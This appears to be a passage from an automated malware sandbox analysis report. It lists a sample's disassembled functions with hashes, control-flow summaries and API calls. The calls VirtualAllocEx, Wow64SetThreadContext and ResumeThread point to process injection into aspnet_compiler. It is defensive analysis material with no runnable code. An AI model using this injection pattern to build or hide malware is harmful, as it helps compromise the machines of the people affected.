                                                • Instruction ID: 2d1dfb7310ba53148f5c82800060ad8ac4b40651e4655fca2d87fbd4f22b2ff5
                                                • Opcode Fuzzy Hash: 4885a1551c145cac8bbf2bcc2e4e190f129bfa1bdef4531c3003942b78a9e991
                                                • Instruction Fuzzy Hash: E53187B9D04258DFCF10CFA9D984ADEFBB1AB59310F14902AE814BB310D334A905CF65
                                                Function 00188E68 Relevance: 1.6, APIs: 1, Instructions: 95memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 146 188e68-188f1d VirtualAllocEx 147 188f1f-188f25 146->147 148 188f26-188f5c 146->148 147->148
                                                APIs
                                                • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 00188F0D
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378279737.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_180000_temp_executable.jbxd
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 93ab4388d03a3cc7b3dcfbb1c7ca0da2186fc7e265098fb120829a4b231814ec
                                                • Instruction ID: 8b99047dd754bff6c08e14486d7b5756fedae747d6678a317549891e2806acbc
                                                • Opcode Fuzzy Hash: 93ab4388d03a3cc7b3dcfbb1c7ca0da2186fc7e265098fb120829a4b231814ec
                                                • Instruction Fuzzy Hash: 553156B9D04258DFCF10CFA9D984ADEFBB5AB59310F20902AE914B7310D335A945CF65
                                                Function 00188C38 Relevance: 1.6, APIs: 1, Instructions: 92threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 151 188c38-188c9c 153 188c9e-188cb0 151->153 154 188cb3-188cfa Wow64SetThreadContext 151->154 153->154 155 188cfc-188d02 154->155 156 188d03-188d3b 154->156 155->156
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 00188CEA
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378279737.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_180000_temp_executable.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: 9244d7c34c31d439e1f7065ee7edb1f826c78dde4c355b4b890236aa3ef27f2a
                                                • Instruction ID: 06f216ec6057ef925655a02fb0d127ac5993d5de9fde20d61bd4d69c8415acc1
                                                • Opcode Fuzzy Hash: 9244d7c34c31d439e1f7065ee7edb1f826c78dde4c355b4b890236aa3ef27f2a
                                                • Instruction Fuzzy Hash: 7C31ACB5D012589FCB10CFAAD984ADEFBF1BB49314F24806AE414BB350C778AA45CF64
                                                Function 00188C40 Relevance: 1.6, APIs: 1, Instructions: 88threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 159 188c40-188c9c 160 188c9e-188cb0 159->160 161 188cb3-188cfa Wow64SetThreadContext 159->161 160->161 162 188cfc-188d02 161->162 163 188d03-188d3b 161->163 162->163
                                                APIs
                                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 00188CEA
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378279737.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_180000_temp_executable.jbxd
                                                Similarity
                                                • API ID: ContextThreadWow64
                                                • String ID:
                                                • API String ID: 983334009-0
                                                • Opcode ID: fc222ef21be8119daa1d7fdbfa9b334befc39e77924bb43fa6784816a250ee1b
                                                • Instruction ID: cf4add4b5ea6a8f07c150e37ea81db85e53ec83996af6f83b064fd08c59c366a
                                                • Opcode Fuzzy Hash: fc222ef21be8119daa1d7fdbfa9b334befc39e77924bb43fa6784816a250ee1b
                                                • Instruction Fuzzy Hash: 13319AB5D012589FCB10CFAAD984ADEFBF1BB49314F24802AE414B7350D778AA45CFA4
                                                Function 001890A9 Relevance: 1.6, APIs: 1, Instructions: 67threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 166 1890a9-189136 ResumeThread 167 189138-18913e 166->167 168 18913f-18916d 166->168 167->168
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378279737.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_180000_temp_executable.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 0eb03105ffb5b67b6a4a7b2e1744bcda8abff8c5602a4448a1ff7c93dcaa947b
                                                • Instruction ID: 3e9290d2513327e3f54f7c1fe58afcfdef2cee43558465df1b5309b55b472a6c
                                                • Opcode Fuzzy Hash: 0eb03105ffb5b67b6a4a7b2e1744bcda8abff8c5602a4448a1ff7c93dcaa947b
                                                • Instruction Fuzzy Hash: 1521AAB5D042099FCF10CFA9D588ADEFBF0AB49360F24906AE818B7310D334A945CFA5
                                                Function 001890B0 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 171 1890b0-189136 ResumeThread 172 189138-18913e 171->172 173 18913f-18916d 171->173 172->173
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378279737.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_180000_temp_executable.jbxd
                                                Similarity
                                                • API ID: ResumeThread
                                                • String ID:
                                                • API String ID: 947044025-0
                                                • Opcode ID: 2d6fac2fa40bd17901749a08234753fe6eac5f213e54029ad41702a5222b7bb2
                                                • Instruction ID: b460de28a7b8a5c631a39cb9bb4cab8f41385c619c3fa6df8180bfc473644732
                                                • Opcode Fuzzy Hash: 2d6fac2fa40bd17901749a08234753fe6eac5f213e54029ad41702a5222b7bb2
                                                • Instruction Fuzzy Hash: BC218AB4D042099FCF10CFA9D588ADEFBF4AB49360F24906AE818B7310D375A945CFA5
                                                Function 001C0418 Relevance: .0, Instructions: 34COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378296221.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_1c0000_temp_executable.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6de8b391b3e4af277308d3904cbddc4dcdaa5fa9f496c17a1eabe107fce37211
                                                • Instruction ID: e8e17c3e583a24bbcdb5cb5597cf6ac5ce5a0c6d1939d662df032dd9bb6c5420
                                                • Opcode Fuzzy Hash: 6de8b391b3e4af277308d3904cbddc4dcdaa5fa9f496c17a1eabe107fce37211
                                                • Instruction Fuzzy Hash: E201EC7490A388AFC742DFA8D854A9DBFB0EF4A300F1580DAE844D7262D2349E58DB52
                                                Function 001C021C Relevance: .0, Instructions: 33COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378296221.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_1c0000_temp_executable.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1b33a8011f6e2c987f7fc33cc1e7616dc3020c6f0337f6047ef5e0321c7bd41d
                                                • Instruction ID: d5b01e1b8a718432618333dcb78b041fd57d7764a75350b42936153a720a051b
                                                • Opcode Fuzzy Hash: 1b33a8011f6e2c987f7fc33cc1e7616dc3020c6f0337f6047ef5e0321c7bd41d
                                                • Instruction Fuzzy Hash: 02F0F43080E3C89FC7039BB4982069C7FB0AF47201B1941EBC484DB2A3D2389E49DB62
                                                Function 001C0564 Relevance: .0, Instructions: 32COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378296221.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_1c0000_temp_executable.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5b119cd23a6f26f3602107f3dcd0489f6d455307c8d201dd9aa0a7aa9cc2a26c
                                                • Instruction ID: bb36e0b72be410b2ff85e79151a1911eaa3e0b5453e57122e05ee74cd2317cd6
                                                • Opcode Fuzzy Hash: 5b119cd23a6f26f3602107f3dcd0489f6d455307c8d201dd9aa0a7aa9cc2a26c
                                                • Instruction Fuzzy Hash: 90F0177480E3C49FC303DBB4A864A487FB4AF0B200F1A41DBD484DB2A3D6389948CB62
                                                Function 001C0A08 Relevance: .0, Instructions: 31COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378296221.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_1c0000_temp_executable.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: af2cf73c767c2dbea77148076bf4e4367dd616c89db7e4a9f4f125aeeb29acc6
                                                • Instruction ID: e642fbaa4b643c553d83326b50738ae29da55d2dc62585fac38549907052270a
                                                • Opcode Fuzzy Hash: af2cf73c767c2dbea77148076bf4e4367dd616c89db7e4a9f4f125aeeb29acc6
                                                • Instruction Fuzzy Hash: 9DF0B770D0A3849FCB53DB78986568DBFB0EF1B204B1541EFC454DB263D2754A49CB52
                                                Function 001C03C8 Relevance: .0, Instructions: 29COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378296221.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_1c0000_temp_executable.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6720e88a9169cfaf5dc0a2d20dbaa75acc6992ffda729ef2e8d3c17d737db1c5
                                                • Instruction ID: d04a43ba28e79ebc4faeab5792a7aad30b5830e7f5823506d8a3de833cd6fafc
                                                • Opcode Fuzzy Hash: 6720e88a9169cfaf5dc0a2d20dbaa75acc6992ffda729ef2e8d3c17d737db1c5
                                                • Instruction Fuzzy Hash: 06F01C3050A388DFC302DBB4EC65A9D7BB8AF07200B5604DAD044DB2A3DA396E49C765
                                                Function 001C09B8 Relevance: .0, Instructions: 24COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378296221.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_1c0000_temp_executable.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f6b2e23a1e1449610c7684dc70ac6803ec0cd41d76c1b6ff95f1e004b185491b
                                                • Instruction ID: 29a2b61e23fca6525f6418644428d6b55103f59c9df633428aaca211218e2cc1
                                                • Opcode Fuzzy Hash: f6b2e23a1e1449610c7684dc70ac6803ec0cd41d76c1b6ff95f1e004b185491b
                                                • Instruction Fuzzy Hash: 9BF0856040A3C69FC717DB748824A4EBFB0AB43200B5901EE9089EB2E3C7340E06CB62
                                                Function 001C0430 Relevance: .0, Instructions: 22COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378296221.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_1c0000_temp_executable.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 86db8dd7e4ef09f1f656aaaeee12ef761aaef661e90850e0c2eede39fdb95572
                                                • Instruction ID: fc86dcdcb06152930ffb678d6365f7ee7cf30d8ed30bf16c2a113f96a34d4868
                                                • Opcode Fuzzy Hash: 86db8dd7e4ef09f1f656aaaeee12ef761aaef661e90850e0c2eede39fdb95572
                                                • Instruction Fuzzy Hash: 85F0AE38A01208EFCB45DFA8D944A9DBBF0FB48300F1081A9E918A7320D731AA54DB81
                                                Function 001C0B68 Relevance: .0, Instructions: 20COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378296221.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_1c0000_temp_executable.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 8c375986d2a2a2bb5d6c756db2d69a484875875326489832b835479d56daffdd
                                                • Instruction ID: d0bc6871b4a1a0e726537fa11fac742a8f9beadb70fc7479012ce5e90e80eaf1
                                                • Opcode Fuzzy Hash: 8c375986d2a2a2bb5d6c756db2d69a484875875326489832b835479d56daffdd
                                                • Instruction Fuzzy Hash: 8DE01274D01308EFCB04DFA8E404A9DBBB5EB48300F1081AAE804A3350D735AA91DF80
                                                Function 001C0238 Relevance: .0, Instructions: 19COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378296221.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_1c0000_temp_executable.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 798c80442093d2001d187f06462a091bf4d5156489912aeb03f14f9cc17c9c72
                                                • Instruction ID: 404cba6483a6752449b874f1963a483fbdaaba3415413cb71ed1e21ddf5575de
                                                • Opcode Fuzzy Hash: 798c80442093d2001d187f06462a091bf4d5156489912aeb03f14f9cc17c9c72
                                                • Instruction Fuzzy Hash: 95E0B670D05308EFCB55DFB8A5156ADBBF4AB89301F2082EAD858A3340D739AB45DB81
                                                Function 001C0A20 Relevance: .0, Instructions: 19COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378296221.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_1c0000_temp_executable.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4e02a9ab1324a86a9b10d6cfc1aa938215351623b09383f2a63d8418e09e03cb
                                                • Instruction ID: 7ed6bfad9799febc6acfe430575265dba96ee91f75bacc0dcd005b34e1345b5f
                                                • Opcode Fuzzy Hash: 4e02a9ab1324a86a9b10d6cfc1aa938215351623b09383f2a63d8418e09e03cb
                                                • Instruction Fuzzy Hash: ECE0B670D01308EFCB54EFA8E55569DBBF4EB48300F5081A9D818A3340D735AA45CF81
                                                Function 001C0580 Relevance: .0, Instructions: 18COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378296221.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_1c0000_temp_executable.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 744505a7ebb0be5a08dee2789d153cd63d8b40b7ca64ad4c414791d2920d66e7
                                                • Instruction ID: de787550fb9f6f1d4198e4be811e1aefaf24c23148b547d19f30552ceefc7ebd
                                                • Opcode Fuzzy Hash: 744505a7ebb0be5a08dee2789d153cd63d8b40b7ca64ad4c414791d2920d66e7
                                                • Instruction Fuzzy Hash: 74E0B674901248DFC740DFA8E555A5DBBF4AB09301F5001A9D90497360E730AA44CB81
                                                Function 001C09D0 Relevance: .0, Instructions: 17COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378296221.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_1c0000_temp_executable.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: edc251e503253d9fa58f01319964ac7eb8c6cb84e562d0dcedb0ffed6f25c61d
                                                • Instruction ID: 6ceb2a3d4f0679a71e90b6f536c2d7f02ca95c5cf725bfd4c99413dbbd647e8f
                                                • Opcode Fuzzy Hash: edc251e503253d9fa58f01319964ac7eb8c6cb84e562d0dcedb0ffed6f25c61d
                                                • Instruction Fuzzy Hash: 4ED05E7090120DEFDB04EFA5E911B5EB3F8AB48300F5000A89809B3340DB319F44DBA1
                                                Function 001C03E0 Relevance: .0, Instructions: 17COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378296221.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_1c0000_temp_executable.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: fe9f3ce2d0c692f1e5d3765543a1dde4492f92bc662a87e156100039bb3779f3
                                                • Instruction ID: 76e5a0edb038983a0e9164a43236d45336b65a141004ab196dc27879b279f7e6
                                                • Opcode Fuzzy Hash: fe9f3ce2d0c692f1e5d3765543a1dde4492f92bc662a87e156100039bb3779f3
                                                • Instruction Fuzzy Hash: 55D01735901208EFC700EBE4E915B9DB3E8EB09200F1144A8A404A3240DB31AF549BA9

                                                Non-executed Functions

                                                Function 00180A78 Relevance: 1.8, Strings: 1, Instructions: 521COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378279737.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_180000_temp_executable.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: p!p
                                                • API String ID: 0-1147775804
                                                • Opcode ID: bb37e3362a655e3a1e5d1f5627fec3dfd3a4d14edaac710641f053e0e0ad3070
                                                • Instruction ID: 786fa29abadd0cd8cb8a63804e116e8f1678bdde49a38e6fd07b2a4c1686c623
                                                • Opcode Fuzzy Hash: bb37e3362a655e3a1e5d1f5627fec3dfd3a4d14edaac710641f053e0e0ad3070
                                                • Instruction Fuzzy Hash: 73320175A00218DFDB55DFA8C884F99BBB2FF49300F1580E9E509AB261DB31AE95DF10
                                                Function 001820F8 Relevance: .1, Instructions: 131COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.378279737.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_180000_temp_executable.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2e03275cf1c6c724f3e3320549c2fd9ab6d88195c4c2a5a326180131df289dfb
                                                • Instruction ID: 5cccb66a1d3025fb034994a27c1f15bb838f03bc86b66db29c52d4de711639d6
                                                • Opcode Fuzzy Hash: 2e03275cf1c6c724f3e3320549c2fd9ab6d88195c4c2a5a326180131df289dfb
                                                • Instruction Fuzzy Hash: 9951E975E052188FDB15DFAAD940ADDBBF2BF89300F14C1AAD409AB265EB305A45DF10

                                                Execution Graph

                                                Execution Coverage:1.1%
                                                Dynamic/Decrypted Code Coverage:4.4%
                                                Signature Coverage:7%
                                                Total number of Nodes:114
                                                Total number of Limit Nodes:11
                                                execution_graph 74108 90f9f0 LdrInitializeThunk 74109 424243 74110 42425f 74109->74110 74111 424287 74110->74111 74112 42429b 74110->74112 74113 42bda3 NtClose 74111->74113 74119 42bda3 74112->74119 74115 424290 74113->74115 74116 4242a4 74122 42def3 RtlAllocateHeap 74116->74122 74118 4242af 74120 42bdc0 74119->74120 74121 42bdce NtClose 74120->74121 74121->74116 74122->74118 74204 4245d3 74208 4245ec 74204->74208 74205 424637 74206 42ddd3 RtlFreeHeap 74205->74206 74207 424647 74206->74207 74208->74205 74209 424677 74208->74209 74211 42467c 74208->74211 74210 42ddd3 RtlFreeHeap 74209->74210 74210->74211 74212 42ef93 74213 42efa3 74212->74213 74214 42efa9 74212->74214 74217 42deb3 74214->74217 74216 42efcf 74220 42c0a3 74217->74220 74219 42dece 74219->74216 74221 42c0bd 74220->74221 74222 42c0cb RtlAllocateHeap 74221->74222 74222->74219 74223 42b413 74224 42b42d 74223->74224 74227 90fdc0 LdrInitializeThunk 74224->74227 74225 42b452 74227->74225 74123 413583 74127 4135a3 74123->74127 74125 41360c 74126 413602 74127->74125 74128 41aca3 RtlFreeHeap LdrInitializeThunk 74127->74128 74128->74126 74129 4133a3 74132 42c013 74129->74132 74133 42c030 74132->74133 74136 90fb68 LdrInitializeThunk 74133->74136 74134 4133c2 74136->74134 74228 41dd53 74229 41dd79 74228->74229 74233 41de70 74229->74233 74234 42f0c3 74229->74234 74231 41de11 74232 42b463 LdrInitializeThunk 74231->74232 74231->74233 74232->74233 74235 42f033 74234->74235 74236 42f090 74235->74236 74237 42deb3 RtlAllocateHeap 74235->74237 74236->74231 74238 42f06d 74237->74238 74239 42ddd3 RtlFreeHeap 74238->74239 74239->74236 74240 423d96 74241 423d9c 74240->74241 74242 423e23 74241->74242 74243 423e38 74241->74243 74244 42bda3 NtClose 74242->74244 74245 42bda3 NtClose 74243->74245 74246 423e2c 74244->74246 74248 423e41 74245->74248 74247 423e78 74248->74247 74249 42ddd3 RtlFreeHeap 74248->74249 74250 423e6c 74249->74250 74137 401ae8 74138 401afe 74137->74138 74141 42f463 74138->74141 74139 401b72 74139->74139 74144 42d993 74141->74144 74145 42d9b9 74144->74145 74154 407263 74145->74154 74147 42d9cf 74153 42da2b 74147->74153 74157 41a993 74147->74157 74149 42d9ee 74150 42c123 ExitProcess 74149->74150 74151 42da03 74149->74151 74150->74151 74168 42c123 74151->74168 74153->74139 74171 415d33 74154->74171 74156 407270 74156->74147 74158 41a9bf 74157->74158 74193 41a883 74158->74193 74161 41aa04 74164 41aa20 74161->74164 74166 42bda3 NtClose 74161->74166 74162 41a9ec 74163 41a9f7 74162->74163 74165 42bda3 NtClose 74162->74165 74163->74149 74164->74149 74165->74163 74167 41aa16 74166->74167 74167->74149 74169 42c140 74168->74169 74170 42c14e ExitProcess 74169->74170 74170->74153 74172 415d4d 74171->74172 74174 415d63 74172->74174 74175 42c7a3 74172->74175 74174->74156 74177 42c7bd 74175->74177 74176 42c7ec 74176->74174 74177->74176 74182 42b463 74177->74182 74183 42b47d 74182->74183 74189 90fae8 LdrInitializeThunk 74183->74189 74184 42b4a6 74186 42ddd3 74184->74186 74190 42c0e3 74186->74190 74188 42c859 74188->74174 74189->74184 74191 42c0fd 74190->74191 74192 42c10b RtlFreeHeap 74191->74192 74192->74188 74194 41a89d 74193->74194 74198 41a979 74193->74198 74199 42b4f3 74194->74199 74197 42bda3 NtClose 74197->74198 74198->74161 74198->74162 74200 42b50d 74199->74200 74203 9107ac LdrInitializeThunk 74200->74203 74201 41a96d 74201->74197 74203->74201

                                                Executed Functions

                                                Function 0042BDA3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 34 42bda3-42bddc call 404593 call 42cf73 NtClose
                                                APIs
                                                • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042BDD7
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383276481.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_400000_aspnet_compiler.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: 665f723a5e82ca476e461ccdd2d259e5560fa7235934546a3ffd52d987c7a3c7
                                                • Instruction ID: d90ea754d99db2d9abd4fcdc73495245e7fae96ad713b828660b781994584198
                                                • Opcode Fuzzy Hash: 665f723a5e82ca476e461ccdd2d259e5560fa7235934546a3ffd52d987c7a3c7
                                                • Instruction Fuzzy Hash: CDE04F712403147BC610AA5AEC41F9B776CDBC5714F004069FA0C67181C7B5BA1487F4
                                                Function 009107AC Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 48 9107ac-9107c1 LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                                • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                                • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                                Function 0090F9F0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 44 90f9f0-90fa05 LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.0000000000A60000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_8f0000_aspnet_compiler.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                Function 0090FAE8 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 45 90fae8-90fafd LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.383393735.0000000000900000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000007.00000002.383393735.00000000008F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000007.00000002.383393735.00000000009F7000.00000040.00001000.00020000.00000000.sdmpDownload File
